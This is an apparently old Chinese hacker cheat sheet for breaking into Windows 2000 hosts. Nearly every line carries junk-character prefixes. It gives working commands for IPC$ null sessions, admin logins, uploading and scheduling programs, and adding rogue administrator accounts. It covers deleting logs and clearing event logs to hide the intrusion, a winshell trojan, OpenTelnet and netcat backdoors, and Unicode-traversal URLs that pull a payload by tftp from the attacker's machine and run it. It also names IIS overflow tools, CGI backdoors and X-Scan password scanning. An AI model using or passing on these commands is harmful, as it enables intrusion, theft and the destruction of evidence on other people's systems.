网管和黑客都必须知道的命令
Vs)Pg\B? 常用的几条NET命令:
emo@&6* }0Qex=vkO (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
Wi
Mi0?$. p#UrZKR (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
_>8ZL)NQQ ~e5hfZv|w (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
ew#t4~hh sF$$S/b (查看远程主机时间) net time \\IP地址
25RFi24>D 1o. O]> (定时启动某个程序) at \\IP地址 02:18 readme.exe
qJ b9JL$s 6.| {l8%r (查看共享) net view \\IP地址
:O}= $[ i"~J -{d} (查看netbios工作组列表) nbtstat -A IP地址
9H9 P'lx9 -rSpgk0wL (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
j>(O1z7 ykv,>nSXLL (这两条把自己增加到管理员组): net user 用户名 密码 /add
k[0Gz |^^'GZ%a net localgroup Administrators 用户名 /add
_H9.AI \YE(E04w57 (断开连接) net use \\IP地址\ipc$ /delete
B 3Y,|* ?32gug\i'} 扫尾:
yF-EHNNf WleE$ , del C:\winnt\system32\logfiles\*.*
Nv@SpV' ]3xb Q1 del C:\winnt\ssytem32\config\*.evt
)_eEM1 a7+w)]r del C:\winnt\system32\dtclog\*.*
G=R`O1-3 ~ [k0ay del C:\winnt\system32\*.log
]_6w(>A@3# gJE m del C:\winnt\system32\*.txt
J3OxM--8" 1&JPyW del C:\winnt\*.txt
SW!lSIk ToWiXH)4 del C:\winnt\*.log
@kCFc} 5hN`}Ve 一、netsvc.exe
Ib(q9!L +>b~nK>M 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
DlHt#Ob7 [ZC{eg+D netsvc /list \\IP地址
v803@9@ =]k0*\PS netsvc schedule \\IP地址 /query
),ur!v LO8`qq*rq netsvc \\IP地址 schedule /start
SJg4P4| %~eIx=s 二、OpenTelnet.exe
TUw+A6u:p {O ]^8#v^ 远程启动主机的Telnet服务,并绑定端口到7878,例如:
W rB:)Q(8= ;m<22@,E& OpenTelnet \\IP地址 用户名 密码 1 7878
d<{>& {t<E*5N]a 然后就可以telnet到主机的7878端口,进入DOS方式下:
~:`5Y"Av: EDQKb TaPt telnet IP地址 7878
!6Sr*a*5 ;L1Q"Hxh 三、winshell.exe
|$*1!pL-QP d??;r: 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
dwd5P7
<$6r1y*G p Path (查看winshell主程序的路径信息)
{kCCpU a_jw4"Sb b reBoot (重新启动机器)
.dA_} ~m:oJ+:O d shutDown (关闭机器)
(}Q(Ux@X >KPxksFR8 s Shell (执行后你就会看到可爱的“C:\>”)
0, b.;r vO>Fj x eXit (退出本次登录会话,此命令并不终止winshell的运行)
,sw|OYb ?A4zIJ\ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
N|JML t1Ty.F)r 四、3389登陆器,GUI方式登录远程主机的
nHAET eh\_;2P 五、elsave.exe
/V-uo(n< . {zd07!9y 事件日志清除工具
O+iNR9O ''t\J^+& elsave -s \\IP地址 -l "application" -C
bSa%?laS _"_
21uB elsave -s \\IP地址 -l "system" -C
%rE:5) tuT>,BbR elsave -s \\IP地址 -l "security" -C
k
P]' 3jSt&+ 执行后成功清除应用程序日志,系统日志,安全日志
I+08tXO pco:]3BF6 六、hbulot.exe
G>siyUh B* 0TM+
开启win2kserver和winxp的3389服务
Y-yozt #mT\B[4h hbulot [/r]
l k~VvRq &>nB@SQZ 使用/r表示安装完成后自动重起目标使设置生效。
|ry![\ Z hqGUb 七、nc.exe(netcat.exe)
(,nQ7,2EX k4N_Pa$}\ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
E?v9c>c ,>
Ya%;h2k 想要连接到某处: nc [-options] hostname port[s] [ports] ...
A9 *P7 v11Uw?CM 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
]|m?pt RSfB9)3D 参数:
+ d?p? v 6!39t -e prog 程序重定向,一旦连接,就执行 [危险!!]
NUO#[7OK+x WiU-syNh -g gateway source-routing hop point[s], up to 8
PiwMl)E|! 53X i) -G num source-routing pointer: 4, 8, 12, ...
u~O9"-m !V 9%#u,I -h 帮助信息
SEKR`2Zz, 2ezk<R5q+ -i secs 延时的间隔
nYsB^Nr6 ^;8dl.; -l 监听模式,用于入站连接
:9H`O!VF !n`9V^` -n 指定数字的IP地址,不能用hostname
4h*c{do %LM2CgH
V -o file 记录16进制的传输
"]SA4Ud^ rF^H\U:w -p port 本地端口号
2v$\mL C.|.0^5 -r 任意指定本地及远程端口
q1^bH6*fl &0*7]Wo* -s addr 本地源地址
5'<J@3B ]
/"!J6(e -u UDP模式
q!10G (X?HuWTm -v 详细输出——用两个-v可得到更详细的内容
!We9T )e uVth&4dh9 -w secs timeout的时间
*KV^X(/ gB_gjn\ -z 将输入输出关掉——用于扫描时
@
^q}.u` 八、TFTPD32.EXE
WJlJD*3 ~XeWN^l(Ov 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
<)$e*HrI .DR*MQI9 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
([ jm=[E^ <@S'vcO 然后可以直接令文件运行:
)H1\4LeP l5T0x=y9! http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
2^X<n{0N) BCmKzv 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
r1&eA% eh iBPIj;, 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
*ZkOZ $jg~a 一、一 Xscan命令行运行参数说明:
RRb>]oD H73 r3BH 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
|jI|},I 5(>ux@[qI: 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
cd&sAK" 8kf5u#,' xscan -file <主机列表文件名> <检测项目> [其他选项]
6Z@?W eemC;JV % 其中<检测项目> 含义如下:
mIe 5{.m# F2>W{-H+ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
\4j(el D!DL6l` -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
P(bds kmg/hNtN -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
#e[S+a 2Rqpok4 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Ofc
u4pi $ba*=/{[q -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
>~l^E!<i-u #[&9~za'"m [其他选项] 含义如下:
(kVxa8 0 .wO-2h{Q -v: 显示详细扫描进度
'kSm}}y ~}_S]^br -p: 跳过Ping不通的主机
Sa-" G` ?>1wZ -o: 跳过没有检测到开放端口的主机
6T5\zInd #z61I"kU -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10